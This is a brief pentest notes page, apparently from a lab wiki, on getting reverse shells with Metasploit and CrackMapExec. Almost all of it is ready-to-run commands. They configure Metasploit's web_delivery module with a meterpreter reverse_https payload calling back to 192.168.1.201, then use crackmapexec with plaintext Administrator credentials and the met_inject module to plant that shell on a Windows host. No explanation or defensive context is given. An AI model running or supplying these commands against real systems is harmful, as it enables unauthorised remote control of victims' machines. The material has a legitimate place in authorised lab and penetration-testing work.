Exploring Reverse Shells with Metasploit and CrackMapExec
Last updated 1 year ago
Was this helpful?
exploit/multi/script/web_delivery
set SRVHOST 192.168.1.201 set SRVPORT 8443 set exitonsession false set SSL true
set payload windows/meterpreter/reverse_https set LHOST 192.168.1.201 set LPORT 443 set LURI rfs
set target 2
exploit -j
crackmapexec smb 192.168.1.119 -u 'Administrator' -p 'Password!' -d dc.deathstar.rfs -M met_inject -o SRVHOST=192.168.1.201 SRVPORT=9443 RAND=J3PR0Jn6smfPvr SSL=https